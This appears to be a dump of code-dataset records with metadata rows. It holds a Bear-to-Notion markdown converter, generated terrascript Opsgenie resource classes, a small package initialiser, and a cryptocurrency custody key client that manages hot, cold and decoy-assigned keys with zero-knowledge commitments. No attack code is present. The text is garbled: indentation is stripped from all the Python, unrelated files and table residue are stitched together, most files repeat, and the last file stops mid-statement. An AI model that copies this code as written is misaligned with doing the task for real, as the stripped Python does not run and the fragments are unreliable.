"""Convert Bear notes in markdown format to Notion formats. It mainly
remove the tags
Args:
source_folder (str, optional): [description]. Defaults to 'bear_notes'.
dst_folder (str, optional): [description]. Defaults to 'changed_notes'.
"""
file_list = glob("bear_notes/*.md")
for file in file_list:
output = ""
title = ""
with open(file) as input_file:
# write the first line directly because it's often the date
output += next(input_file)
title = output
tabed_line = False
block_tag = False
tag = ""
for line in input_file:
tab_count = 0
# check if this is in a list
if line[0].isdigit():
tabed_line = True
# take out leading # because it won't process indentations with
# learning "#"
if line.startswith('#') and not block_tag:
tag += line
# process the code blocks by indentation
elif line.startswith('```') and not block_tag and tabed_line:
output += f"{tab_string}{line}"
block_tag = True
elif line.startswith('```') and block_tag and tabed_line:
output += f"{tab_string}{line}"
block_tag = False
elif block_tag and tabed_line:
output += f"{tab_string}{line}"
else:
output += line
# count how many tabs are there to indent code properly
tab_count = line.count("\t")
tab_string = "\t" * tab_count
# print tag at the end
if tag:
output += f"\n\ntags: {tag}"
# write to output file
# take out first "# " char
no_hash_title = title[2:].replace("\n","")
# if first letter is a number
if no_hash_title[0].isdigit() and "/" in no_hash_title:
tokens = no_hash_title.split("/")
# sometimes the year is 4 letters long
if len(tokens[2]) == 4:
changed_title = f"{tokens[2]}-{tokens[0]}-{tokens[1]}"
else:
changed_title = f"20{tokens[2]}-{tokens[0]}-{tokens[1]}"
dst_file = Path(dst_folder) / Path(f"{changed_title}.md")
else:
dst_file = Path(dst_folder) / Path(f"{no_hash_title}.md")
with open(dst_file, "w") as output_file:
output_file.write(output)
def main():
bear_to_notion()
if __name__ == "__main__":
main()
| 33.123596
| 79
| 0.500678
|
from glob import glob
from pathlib import Path
def bear_to_notion(source_folder: str = 'bear_notes',
dst_folder: str = 'changed_notes') -> None:
file_list = glob("bear_notes/*.md")
for file in file_list:
output = ""
title = ""
with open(file) as input_file:
output += next(input_file)
title = output
tabed_line = False
block_tag = False
tag = ""
for line in input_file:
tab_count = 0
# check if this is in a list
if line[0].isdigit():
tabed_line = True
# take out leading # because it won't process indentations with
if line.startswith('#') and not block_tag:
tag += line
elif line.startswith('```') and not block_tag and tabed_line:
output += f"{tab_string}{line}"
block_tag = True
elif line.startswith('```') and block_tag and tabed_line:
output += f"{tab_string}{line}"
block_tag = False
elif block_tag and tabed_line:
output += f"{tab_string}{line}"
else:
output += line
tab_count = line.count("\t")
tab_string = "\t" * tab_count
if tag:
output += f"\n\ntags: {tag}"
no_hash_title = title[2:].replace("\n","")
if no_hash_title[0].isdigit() and "/" in no_hash_title:
tokens = no_hash_title.split("/")
if len(tokens[2]) == 4:
changed_title = f"{tokens[2]}-{tokens[0]}-{tokens[1]}"
else:
changed_title = f"20{tokens[2]}-{tokens[0]}-{tokens[1]}"
dst_file = Path(dst_folder) / Path(f"{changed_title}.md")
else:
dst_file = Path(dst_folder) / Path(f"{no_hash_title}.md")
with open(dst_file, "w") as output_file:
output_file.write(output)
def main():
bear_to_notion()
if __name__ == "__main__":
main()
| true
| true
|
1c3e9ab846f7918dcf9e79fdc7c1a3960ef0324e
| 1,408
|
py
|
Python
|
terrascript/opsgenie/r.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
terrascript/opsgenie/r.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
terrascript/opsgenie/r.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# terrascript/opsgenie/r.py
# Automatically generated by tools/makecode.py ()
import warnings
warnings.warn(
"using the 'legacy layout' is deprecated", DeprecationWarning, stacklevel=2
)
import terrascript
class opsgenie_alert_policy(terrascript.Resource):
pass
class opsgenie_api_integration(terrascript.Resource):
pass
class opsgenie_custom_role(terrascript.Resource):
pass
class opsgenie_email_integration(terrascript.Resource):
pass
class opsgenie_escalation(terrascript.Resource):
pass
class opsgenie_heartbeat(terrascript.Resource):
pass
class opsgenie_incident_template(terrascript.Resource):
pass
class opsgenie_integration_action(terrascript.Resource):
pass
class opsgenie_maintenance(terrascript.Resource):
pass
class opsgenie_notification_policy(terrascript.Resource):
pass
class opsgenie_notification_rule(terrascript.Resource):
pass
class opsgenie_schedule(terrascript.Resource):
pass
class opsgenie_schedule_rotation(terrascript.Resource):
pass
class opsgenie_service(terrascript.Resource):
pass
class opsgenie_service_incident_rule(terrascript.Resource):
pass
class opsgenie_team(terrascript.Resource):
pass
class opsgenie_team_routing_rule(terrascript.Resource):
pass
class opsgenie_user(terrascript.Resource):
pass
class opsgenie_user_contact(terrascript.Resource):
pass
| 16.372093
| 79
| 0.791193
|
import warnings
warnings.warn(
"using the 'legacy layout' is deprecated", DeprecationWarning, stacklevel=2
)
import terrascript
class opsgenie_alert_policy(terrascript.Resource):
pass
class opsgenie_api_integration(terrascript.Resource):
pass
class opsgenie_custom_role(terrascript.Resource):
pass
class opsgenie_email_integration(terrascript.Resource):
pass
class opsgenie_escalation(terrascript.Resource):
pass
class opsgenie_heartbeat(terrascript.Resource):
pass
class opsgenie_incident_template(terrascript.Resource):
pass
class opsgenie_integration_action(terrascript.Resource):
pass
class opsgenie_maintenance(terrascript.Resource):
pass
class opsgenie_notification_policy(terrascript.Resource):
pass
class opsgenie_notification_rule(terrascript.Resource):
pass
class opsgenie_schedule(terrascript.Resource):
pass
class opsgenie_schedule_rotation(terrascript.Resource):
pass
class opsgenie_service(terrascript.Resource):
pass
class opsgenie_service_incident_rule(terrascript.Resource):
pass
class opsgenie_team(terrascript.Resource):
pass
class opsgenie_team_routing_rule(terrascript.Resource):
pass
class opsgenie_user(terrascript.Resource):
pass
class opsgenie_user_contact(terrascript.Resource):
pass
| true
| true
|
1c3e9b4eca04a197b5e9a5aa98e9653eb68cc0da
| 213
|
py
|
Python
|
rapa/__init__.py
|
FOXOBioScience/rapa
|
ab226d0c27a867b43a76f576c98a954de9504360
|
[
"MIT"
] | 1
|
2021-04-29T16:42:12.000Z
|
2021-04-29T16:42:12.000Z
|
rapa/__init__.py
|
FoxoTech/rapa
|
ab226d0c27a867b43a76f576c98a954de9504360
|
[
"MIT"
] | 4
|
2021-02-24T18:24:17.000Z
|
2021-03-18T17:58:51.000Z
|
rapa/__init__.py
|
FOXOBioScience/rapa
|
ab226d0c27a867b43a76f576c98a954de9504360
|
[
"MIT"
] | 1
|
2021-11-12T02:04:05.000Z
|
2021-11-12T02:04:05.000Z
|
# Warnings from dependencies are suppressed everywhere, propagating into all created loggers
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
from . import rapa
from . import version
| 35.5
| 92
| 0.830986
|
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
from . import rapa
from . import version
| true
| true
|
1c3e9b81fd617497d11f8c7dfa97e3268d0c825b
| 17,342
|
py
|
Python
|
backend/backend/utils/key_client.py
|
ravirahman/sancus
|
6563852b98edeb1068574e2d99e1fc18b815bee3
|
[
"MIT"
] | 2
|
2022-03-17T04:50:20.000Z
|
2022-03-17T04:51:31.000Z
|
backend/backend/utils/key_client.py
|
ravirahman/sancus
|
6563852b98edeb1068574e2d99e1fc18b815bee3
|
[
"MIT"
] | null | null | null |
backend/backend/utils/key_client.py
|
ravirahman/sancus
|
6563852b98edeb1068574e2d99e1fc18b815bee3
|
[
"MIT"
] | null | null | null |
import logging
import secrets
import uuid
from decimal import Decimal
from typing import List, Optional, Sequence
import petlib.ec
import sqlalchemy.orm
from common.constants import ADMIN_UUID, SECP256K1_ORDER, Blockchain, Currency
from common.utils.uuid import generate_uuid4
from common.utils.zk import NIZK
from common.utils.zk.bit_commitment import generate_bit_commitment
from common.utils.zk.key_permutation import permute_private_key, permute_public_key
from protobufs.institution.account_pb2 import KeyType
from sqlalchemy import desc
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm import Session
from sqlalchemy.orm.exc import NoResultFound
from backend.sql.account import Account
from backend.sql.blockchain_address_key import BlockchainAddressKey
from backend.sql.key import Key
from backend.sql.key_account_commitment import KeyAccountCommitment
from backend.sql.key_currency_account import KeyCurrencyAccount
from backend.sql.key_currency_block import KeyCurrencyBlock
LOGGER = logging.getLogger(__name__)
class KeyClient:
def __init__(
self,
sessionmaker: sqlalchemy.orm.sessionmaker,
deposit_key_decoy_set_size: int,
) -> None:
self._sessionmaker = sessionmaker
self._deposit_key_decoy_set_size = deposit_key_decoy_set_size
@staticmethod
def _add_new_key_account_commitment(
session: Session,
key: Key,
account_uuid: uuid.UUID,
deposits_will_be_credited_to_account_for_key: bool,
) -> None:
r = SECP256K1_ORDER.random()
permuted_public_key = key.permuted_secp256k1_public_key
_, bit_commitment_nizk = generate_bit_commitment(
s=deposits_will_be_credited_to_account_for_key, G=permuted_public_key, r=r
)
session.add(
KeyAccountCommitment(
key_uuid=key.key_uuid,
account_uuid=account_uuid,
s=deposits_will_be_credited_to_account_for_key,
r=r,
nizk=bit_commitment_nizk,
)
)
@staticmethod
def _add_blockchain_addresses(session: Session, key: Key) -> None:
for blockchain in Blockchain:
address = key.get_address(blockchain)
session.add(
BlockchainAddressKey(
blockchain=blockchain,
address=address,
key_uuid=key.key_uuid,
)
)
def _add_new_hot_key(self, session: Session, private_key: petlib.bn.Bn) -> Key:
k = SECP256K1_ORDER.random()
permuted_private_key, nizk = permute_private_key(private_key, k)
key = Key(
key_uuid=generate_uuid4(),
key_type=KeyType.HOT,
private_key=private_key,
permuted_private_key=permuted_private_key,
permutation_nizk=nizk,
)
session.add(key)
self._track_owned_key(session, key)
self._add_blockchain_addresses(session, key)
return key
@staticmethod
def get_key_currency_block(
session: Session, key_uuid: uuid.UUID, currency: Currency, block_number: int
) -> KeyCurrencyBlock:
key_currency_block = (
session.query(KeyCurrencyBlock)
.filter(
KeyCurrencyBlock.key_uuid == key_uuid,
KeyCurrencyBlock.currency == currency,
KeyCurrencyBlock.block_number <= block_number,
)
.order_by(desc(KeyCurrencyBlock.block_number))
.first()
)
if key_currency_block is None:
raise ValueError(f"key_uuid({key_uuid}) not found")
return key_currency_block
def get_balance(self, key_uuid: uuid.UUID, currency: Currency, block_number: int) -> Decimal:
with self._sessionmaker() as session:
key_currency = (
session.query(KeyCurrencyAccount)
.filter(
KeyCurrencyAccount.key_uuid == key_uuid,
KeyCurrencyAccount.currency == currency,
)
.one()
)
initial_balance = key_currency.initial_balance
key_currency_block = self.get_key_currency_block(session, key_uuid, currency, block_number)
balance = (
initial_balance
+ key_currency_block.cumulative_tracked_deposit_amount
- key_currency_block.cumulative_tracked_withdrawal_amount
)
assert isinstance(balance, Decimal)
return balance
def find_or_create_admin_key(
self, session: Session, currency: Currency, *, excluded_key_uuids: Sequence[uuid.UUID] = tuple()
) -> Key:
# this function returns a key, that for the session, is guaranteed to be admin
# callee is required to perform an atomic update of the pending_admin_deposit counter
# whenever using this key for deposits. When doing the atomic update, require that it is
# still an admin key
query = session.query(Key).filter(
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.currency == currency,
Key.key_uuid == KeyCurrencyAccount.key_uuid,
Key.key_uuid.notin_(excluded_key_uuids),
)
count = query.count()
key: Optional[Key] = None
if count > 0:
key = query.order_by(Key.created_at).offset(secrets.randbelow(count)).first()
if key is None:
private_key = SECP256K1_ORDER.random()
key = self._add_new_hot_key(session, private_key)
return key
def make_new_hot_key(self) -> uuid.UUID:
with self._sessionmaker() as session:
private_key = SECP256K1_ORDER.random()
key = self._add_new_hot_key(session, private_key)
session.commit()
key_uuid = key.key_uuid
assert isinstance(key_uuid, uuid.UUID)
return key_uuid
def import_hot_key(self, private_key: petlib.bn.Bn, ethereum_transaction_count: int = 0) -> uuid.UUID:
with self._sessionmaker() as session:
key = self._add_new_hot_key(session, private_key)
key.ethereum_transaction_count = ethereum_transaction_count
session.commit()
key_uuid = key.key_uuid
assert isinstance(key_uuid, uuid.UUID)
return key_uuid
def _add_key_and_decoy_accounts(self, session: Session, key: Key, account: Account) -> None:
decoy_account_uuids = [account.uuid]
while len(decoy_account_uuids) < self._deposit_key_decoy_set_size:
query = session.query(Account.uuid).filter(
Account.uuid.notin_(decoy_account_uuids),
Account.account_type == account.account_type,
Account.currency == account.currency,
)
count = query.count()
if count == 0:
break
decoy_accounts = query.order_by(Account.created_at).offset(secrets.randbelow(count)).first()
if decoy_accounts is not None:
(decoy_account_uuid,) = decoy_accounts
decoy_account_uuids.append(decoy_account_uuid)
# we want to randomize the order in which we add the accounts so timestamps aren't a giveaway
while len(decoy_account_uuids) > 0:
i = secrets.randbelow(len(decoy_account_uuids))
account_uuid = decoy_account_uuids[i]
decoy_account_uuids[i] = decoy_account_uuids[-1]
decoy_account_uuids.pop()
if account_uuid == account.uuid:
self._add_new_key_account_commitment(
session,
key=key,
account_uuid=account.uuid,
# if account is owned by admin, never credit deposits
deposits_will_be_credited_to_account_for_key=account.user_uuid != ADMIN_UUID,
)
continue
self._add_new_key_account_commitment(
session,
key=key,
account_uuid=account_uuid,
deposits_will_be_credited_to_account_for_key=False,
)
def find_or_create_key_and_assign_to_account(self, account_uuid: uuid.UUID) -> uuid.UUID:
with self._sessionmaker() as session:
account = (
session.query(Account)
.filter(
Account.uuid == account_uuid,
)
.one()
)
currency = account.currency
bad_key_uuids: List[uuid.UUID] = []
for _ in range(5):
with self._sessionmaker() as session:
# select a "candidate" without locking
query = session.query(KeyCurrencyAccount.key_uuid).filter(
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.currency == currency,
KeyCurrencyAccount.pending_admin_deposits == 0,
KeyCurrencyAccount.key_uuid.notin_(bad_key_uuids),
)
count = query.count()
if count == 0:
break
offset = secrets.randbelow(count)
key_uuids = query.order_by(KeyCurrencyAccount.created_at).offset(offset).first()
if key_uuids is None:
break
(key_uuid,) = key_uuids
assert isinstance(key_uuid, uuid.UUID)
# check to see if we are a decoy
already_a_commitment = (
session.query(KeyAccountCommitment)
.filter(
KeyAccountCommitment.key_uuid == key_uuid, KeyAccountCommitment.account_uuid == account_uuid
)
.limit(1)
.count()
> 0
)
if already_a_commitment:
bad_key_uuids.append(key_uuid)
continue
with self._sessionmaker() as session:
# now, attempt to lock the candidate
try:
key_currency_account = (
session.query(KeyCurrencyAccount)
.filter(
KeyCurrencyAccount.key_uuid == key_uuid,
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.currency == currency,
KeyCurrencyAccount.pending_admin_deposits == 0,
)
.populate_existing()
.with_for_update(nowait=True)
.one()
)
except (OperationalError, NoResultFound):
# race condition
continue
account = (
session.query(Account)
.filter(
Account.uuid == account_uuid,
)
.one()
)
key_currency_account.account_uuid = account_uuid
# if you are admin, then setting pending_admin_deposits to 1
# so this key is permanently locked
key_currency_account.pending_admin_deposits = int(account_uuid == ADMIN_UUID)
key = session.query(Key).filter(Key.key_uuid == key_currency_account.key_uuid).one()
LOGGER.info("Assigning existing key(%s) to account(%s)", key.key_uuid, account.uuid)
self._add_key_and_decoy_accounts(session, key, account)
session.commit()
return key_uuid
# if we get here, none of the accounts we tried worked. Let's create a new one.
with self._sessionmaker() as session:
account = (
session.query(Account)
.filter(
Account.uuid == account_uuid,
)
.one()
)
private_key = SECP256K1_ORDER.random()
key = self._add_new_hot_key(session, private_key)
key_currency_account = (
session.query(KeyCurrencyAccount)
.filter(
KeyCurrencyAccount.key_uuid == key.key_uuid,
KeyCurrencyAccount.currency == account.currency,
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.pending_admin_deposits == 0,
)
.populate_existing()
.with_for_update()
.one()
)
key_currency_account.account_uuid = account_uuid
key_currency_account.pending_admin_deposits = int(account_uuid == ADMIN_UUID)
LOGGER.info("Assigning new key(%s) to account(%s)", key.key_uuid, account.uuid)
self._add_key_and_decoy_accounts(session, key, account)
key_uuid = key.key_uuid
assert isinstance(key_uuid, uuid.UUID)
session.commit()
return key_uuid
def add_cold_key(
self,
key_uuid: uuid.UUID,
public_key: petlib.ec.EcPt,
permuted_private_key: petlib.bn.Bn,
nizk: NIZK,
ethereum_transaction_count: int = 0,
) -> None:
key = Key(
key_uuid=key_uuid,
secp256k1_public_key=public_key,
key_type=KeyType.COLD,
permuted_private_key=permuted_private_key,
permutation_nizk=nizk,
ethereum_transaction_count=ethereum_transaction_count,
)
with self._sessionmaker() as session:
session.add(key)
self._add_blockchain_addresses(session, key)
self._track_owned_key(session, key)
session.commit()
def add_anonymous_key(self, public_key: petlib.ec.EcPt) -> uuid.UUID:
k = SECP256K1_ORDER.random()
permuted_public_key, nizk = permute_public_key(public_key, k)
key = Key(
key_uuid=generate_uuid4(),
secp256k1_public_key=public_key,
key_type=KeyType.ANONYMOUS,
permuted_secp256k1_public_key=permuted_public_key,
permutation_nizk=nizk,
)
with self._sessionmaker() as session:
session.add(key)
self._add_blockchain_addresses(session, key)
self._track_anonymous_key(session, key)
session.commit()
key_uuid = key.key_uuid
assert isinstance(key_uuid, uuid.UUID)
return key_uuid
@staticmethod
def _track_owned_key(session: Session, key: Key) -> None:
for currency in Currency:
key_currency_account = KeyCurrencyAccount(
key_uuid=key.key_uuid,
currency=currency,
account_uuid=ADMIN_UUID,
available_balance=None,
)
session.add(key_currency_account)
@staticmethod
def _track_anonymous_key(session: Session, key: Key) -> None:
for currency in Currency:
key_currency_account = KeyCurrencyAccount(
key_uuid=key.key_uuid,
currency=currency,
)
session.add(key_currency_account)
def assign_key_as_decoy_to_account(self, *, key_uuid: uuid.UUID, account_uuid: uuid.UUID) -> None:
assert account_uuid != ADMIN_UUID, "cannot assign decoy for admin"
with self._sessionmaker() as session:
key = session.query(Key).filter(Key.key_uuid == key_uuid).one()
self._add_new_key_account_commitment(
session,
key,
account_uuid,
deposits_will_be_credited_to_account_for_key=False,
)
session.commit()
def assign_key_for_deposits_to_account(self, *, key_uuid: uuid.UUID, account_uuid: uuid.UUID) -> None:
assert account_uuid != ADMIN_UUID, "cannot assign back to admin"
with self._sessionmaker() as session:
key = session.query(Key).filter(Key.key_uuid == key_uuid).one()
if not key.ownership_s:
raise ValueError(
"key is not owned and therefore "
"cannot be assigned since we do not know the corresponding private key"
)
account = session.query(Account).filter(Account.uuid == account_uuid).one()
key_currency_account = (
session.query(KeyCurrencyAccount)
.filter(
KeyCurrencyAccount.key_uuid == key_uuid,
KeyCurrencyAccount.currency == account.currency,
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.pending_admin_deposits == 0,
)
.populate_existing()
.with_for_update()
.one()
)
key_currency_account.account_uuid = account_uuid
self._add_new_key_account_commitment(
session,
key=key,
account_uuid=account_uuid,
deposits_will_be_credited_to_account_for_key=True,
)
session.commit()
| 41.787952
| 116
| 0.589897
|
import logging
import secrets
import uuid
from decimal import Decimal
from typing import List, Optional, Sequence
import petlib.ec
import sqlalchemy.orm
from common.constants import ADMIN_UUID, SECP256K1_ORDER, Blockchain, Currency
from common.utils.uuid import generate_uuid4
from common.utils.zk import NIZK
from common.utils.zk.bit_commitment import generate_bit_commitment
from common.utils.zk.key_permutation import permute_private_key, permute_public_key
from protobufs.institution.account_pb2 import KeyType
from sqlalchemy import desc
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm import Session
from sqlalchemy.orm.exc import NoResultFound
from backend.sql.account import Account
from backend.sql.blockchain_address_key import BlockchainAddressKey
from backend.sql.key import Key
from backend.sql.key_account_commitment import KeyAccountCommitment
from backend.sql.key_currency_account import KeyCurrencyAccount
from backend.sql.key_currency_block import KeyCurrencyBlock
LOGGER = logging.getLogger(__name__)
class KeyClient:
def __init__(
self,
sessionmaker: sqlalchemy.orm.sessionmaker,
deposit_key_decoy_set_size: int,
) -> None:
self._sessionmaker = sessionmaker
self._deposit_key_decoy_set_size = deposit_key_decoy_set_size
@staticmethod
def _add_new_key_account_commitment(
session: Session,
key: Key,
account_uuid: uuid.UUID,
deposits_will_be_credited_to_account_for_key: bool,
) -> None:
r = SECP256K1_ORDER.random()
permuted_public_key = key.permuted_secp256k1_public_key
_, bit_commitment_nizk = generate_bit_commitment(
s=deposits_will_be_credited_to_account_for_key, G=permuted_public_key, r=r
)
session.add(
KeyAccountCommitment(
key_uuid=key.key_uuid,
account_uuid=account_uuid,
s=deposits_will_be_credited_to_account_for_key,
r=r,
nizk=bit_commitment_nizk,
)
)
@staticmethod
def _add_blockchain_addresses(session: Session, key: Key) -> None:
for blockchain in Blockchain:
address = key.get_address(blockchain)
session.add(
BlockchainAddressKey(
blockchain=blockchain,
address=address,
key_uuid=key.key_uuid,
)
)
def _add_new_hot_key(self, session: Session, private_key: petlib.bn.Bn) -> Key:
k = SECP256K1_ORDER.random()
permuted_private_key, nizk = permute_private_key(private_key, k)
key = Key(
key_uuid=generate_uuid4(),
key_type=KeyType.HOT,
private_key=private_key,
permuted_private_key=permuted_private_key,
permutation_nizk=nizk,
)
session.add(key)
self._track_owned_key(session, key)
self._add_blockchain_addresses(session, key)
return key
@staticmethod
def get_key_currency_block(
session: Session, key_uuid: uuid.UUID, currency: Currency, block_number: int
) -> KeyCurrencyBlock:
key_currency_block = (
session.query(KeyCurrencyBlock)
.filter(
KeyCurrencyBlock.key_uuid == key_uuid,
KeyCurrencyBlock.currency == currency,
KeyCurrencyBlock.block_number <= block_number,
)
.order_by(desc(KeyCurrencyBlock.block_number))
.first()
)
if key_currency_block is None:
raise ValueError(f"key_uuid({key_uuid}) not found")
return key_currency_block
def get_balance(self, key_uuid: uuid.UUID, currency: Currency, block_number: int) -> Decimal:
with self._sessionmaker() as session:
key_currency = (
session.query(KeyCurrencyAccount)
.filter(
KeyCurrencyAccount.key_uuid == key_uuid,
KeyCurrencyAccount.currency == currency,
)
.one()
)
initial_balance = key_currency.initial_balance
key_currency_block = self.get_key_currency_block(session, key_uuid, currency, block_number)
balance = (
initial_balance
+ key_currency_block.cumulative_tracked_deposit_amount
- key_currency_block.cumulative_tracked_withdrawal_amount
)
assert isinstance(balance, Decimal)
return balance
def find_or_create_admin_key(
self, session: Session, currency: Currency, *, excluded_key_uuids: Sequence[uuid.UUID] = tuple()
) -> Key:
query = session.query(Key).filter(
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.currency == currency,
Key.key_uuid == KeyCurrencyAccount.key_uuid,
Key.key_uuid.notin_(excluded_key_uuids),
)
count = query.count()
key: Optional[Key] = None
if count > 0:
key = query.order_by(Key.created_at).offset(secrets.randbelow(count)).first()
if key is None:
private_key = SECP256K1_ORDER.random()
key = self._add_new_hot_key(session, private_key)
return key
def make_new_hot_key(self) -> uuid.UUID:
with self._sessionmaker() as session:
private_key = SECP256K1_ORDER.random()
key = self._add_new_hot_key(session, private_key)
session.commit()
key_uuid = key.key_uuid
assert isinstance(key_uuid, uuid.UUID)
return key_uuid
def import_hot_key(self, private_key: petlib.bn.Bn, ethereum_transaction_count: int = 0) -> uuid.UUID:
with self._sessionmaker() as session:
key = self._add_new_hot_key(session, private_key)
key.ethereum_transaction_count = ethereum_transaction_count
session.commit()
key_uuid = key.key_uuid
assert isinstance(key_uuid, uuid.UUID)
return key_uuid
def _add_key_and_decoy_accounts(self, session: Session, key: Key, account: Account) -> None:
decoy_account_uuids = [account.uuid]
while len(decoy_account_uuids) < self._deposit_key_decoy_set_size:
query = session.query(Account.uuid).filter(
Account.uuid.notin_(decoy_account_uuids),
Account.account_type == account.account_type,
Account.currency == account.currency,
)
count = query.count()
if count == 0:
break
decoy_accounts = query.order_by(Account.created_at).offset(secrets.randbelow(count)).first()
if decoy_accounts is not None:
(decoy_account_uuid,) = decoy_accounts
decoy_account_uuids.append(decoy_account_uuid)
while len(decoy_account_uuids) > 0:
i = secrets.randbelow(len(decoy_account_uuids))
account_uuid = decoy_account_uuids[i]
decoy_account_uuids[i] = decoy_account_uuids[-1]
decoy_account_uuids.pop()
if account_uuid == account.uuid:
self._add_new_key_account_commitment(
session,
key=key,
account_uuid=account.uuid,
# if account is owned by admin, never credit deposits
deposits_will_be_credited_to_account_for_key=account.user_uuid != ADMIN_UUID,
)
continue
self._add_new_key_account_commitment(
session,
key=key,
account_uuid=account_uuid,
deposits_will_be_credited_to_account_for_key=False,
)
def find_or_create_key_and_assign_to_account(self, account_uuid: uuid.UUID) -> uuid.UUID:
with self._sessionmaker() as session:
account = (
session.query(Account)
.filter(
Account.uuid == account_uuid,
)
.one()
)
currency = account.currency
bad_key_uuids: List[uuid.UUID] = []
for _ in range(5):
with self._sessionmaker() as session:
# select a "candidate" without locking
query = session.query(KeyCurrencyAccount.key_uuid).filter(
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.currency == currency,
KeyCurrencyAccount.pending_admin_deposits == 0,
KeyCurrencyAccount.key_uuid.notin_(bad_key_uuids),
)
count = query.count()
if count == 0:
break
offset = secrets.randbelow(count)
key_uuids = query.order_by(KeyCurrencyAccount.created_at).offset(offset).first()
if key_uuids is None:
break
(key_uuid,) = key_uuids
assert isinstance(key_uuid, uuid.UUID)
# check to see if we are a decoy
already_a_commitment = (
session.query(KeyAccountCommitment)
.filter(
KeyAccountCommitment.key_uuid == key_uuid, KeyAccountCommitment.account_uuid == account_uuid
)
.limit(1)
.count()
> 0
)
if already_a_commitment:
bad_key_uuids.append(key_uuid)
continue
with self._sessionmaker() as session:
# now, attempt to lock the candidate
try:
key_currency_account = (
session.query(KeyCurrencyAccount)
.filter(
KeyCurrencyAccount.key_uuid == key_uuid,
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.currency == currency,
KeyCurrencyAccount.pending_admin_deposits == 0,
)
.populate_existing()
.with_for_update(nowait=True)
.one()
)
except (OperationalError, NoResultFound):
# race condition
continue
account = (
session.query(Account)
.filter(
Account.uuid == account_uuid,
)
.one()
)
key_currency_account.account_uuid = account_uuid
# if you are admin, then setting pending_admin_deposits to 1
# so this key is permanently locked
key_currency_account.pending_admin_deposits = int(account_uuid == ADMIN_UUID)
key = session.query(Key).filter(Key.key_uuid == key_currency_account.key_uuid).one()
LOGGER.info("Assigning existing key(%s) to account(%s)", key.key_uuid, account.uuid)
self._add_key_and_decoy_accounts(session, key, account)
session.commit()
return key_uuid
# if we get here, none of the accounts we tried worked. Let's create a new one.
with self._sessionmaker() as session:
account = (
session.query(Account)
.filter(
Account.uuid == account_uuid,
)
.one()
)
private_key = SECP256K1_ORDER.random()
key = self._add_new_hot_key(session, private_key)
key_currency_account = (
session.query(KeyCurrencyAccount)
.filter(
KeyCurrencyAccount.key_uuid == key.key_uuid,
KeyCurrencyAccount.currency == account.currency,
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.pending_admin_deposits == 0,
)
.populate_existing()
.with_for_update()
.one()
)
key_currency_account.account_uuid = account_uuid
key_currency_account.pending_admin_deposits = int(account_uuid == ADMIN_UUID)
LOGGER.info("Assigning new key(%s) to account(%s)", key.key_uuid, account.uuid)
self._add_key_and_decoy_accounts(session, key, account)
key_uuid = key.key_uuid
assert isinstance(key_uuid, uuid.UUID)
session.commit()
return key_uuid
def add_cold_key(
self,
key_uuid: uuid.UUID,
public_key: petlib.ec.EcPt,
permuted_private_key: petlib.bn.Bn,
nizk: NIZK,
ethereum_transaction_count: int = 0,
) -> None:
key = Key(
key_uuid=key_uuid,
secp256k1_public_key=public_key,
key_type=KeyType.COLD,
permuted_private_key=permuted_private_key,
permutation_nizk=nizk,
ethereum_transaction_count=ethereum_transaction_count,
)
with self._sessionmaker() as session:
session.add(key)
self._add_blockchain_addresses(session, key)
self._track_owned_key(session, key)
session.commit()
def add_anonymous_key(self, public_key: petlib.ec.EcPt) -> uuid.UUID:
k = SECP256K1_ORDER.random()
permuted_public_key, nizk = permute_public_key(public_key, k)
key = Key(
key_uuid=generate_uuid4(),
secp256k1_public_key=public_key,
key_type=KeyType.ANONYMOUS,
permuted_secp256k1_public_key=permuted_public_key,
permutation_nizk=nizk,
)
with self._sessionmaker() as session:
session.add(key)
self._add_blockchain_addresses(session, key)
self._track_anonymous_key(session, key)
session.commit()
key_uuid = key.key_uuid
assert isinstance(key_uuid, uuid.UUID)
return key_uuid
@staticmethod
def _track_owned_key(session: Session, key: Key) -> None:
for currency in Currency:
key_currency_account = KeyCurrencyAccount(
key_uuid=key.key_uuid,
currency=currency,
account_uuid=ADMIN_UUID,
available_balance=None,
)
session.add(key_currency_account)
@staticmethod
def _track_anonymous_key(session: Session, key: Key) -> None:
for currency in Currency:
key_currency_account = KeyCurrencyAccount(
key_uuid=key.key_uuid,
currency=currency,
)
session.add(key_currency_account)
def assign_key_as_decoy_to_account(self, *, key_uuid: uuid.UUID, account_uuid: uuid.UUID) -> None:
assert account_uuid != ADMIN_UUID, "cannot assign decoy for admin"
with self._sessionmaker() as session:
key = session.query(Key).filter(Key.key_uuid == key_uuid).one()
self._add_new_key_account_commitment(
session,
key,
account_uuid,
deposits_will_be_credited_to_account_for_key=False,
)
session.commit()
def assign_key_for_deposits_to_account(self, *, key_uuid: uuid.UUID, account_uuid: uuid.UUID) -> None:
assert account_uuid != ADMIN_UUID, "cannot assign back to admin"
with self._sessionmaker() as session:
key = session.query(Key).filter(Key.key_uuid == key_uuid).one()
if not key.ownership_s:
raise ValueError(
"key is not owned and therefore "
"cannot be assigned since we do not know the corresponding private key"
)
account = session.query(Account).filter(Account.uuid == account_uuid).one()
key_currency_account = (
session.query(KeyCurrencyAccount)
.filter(
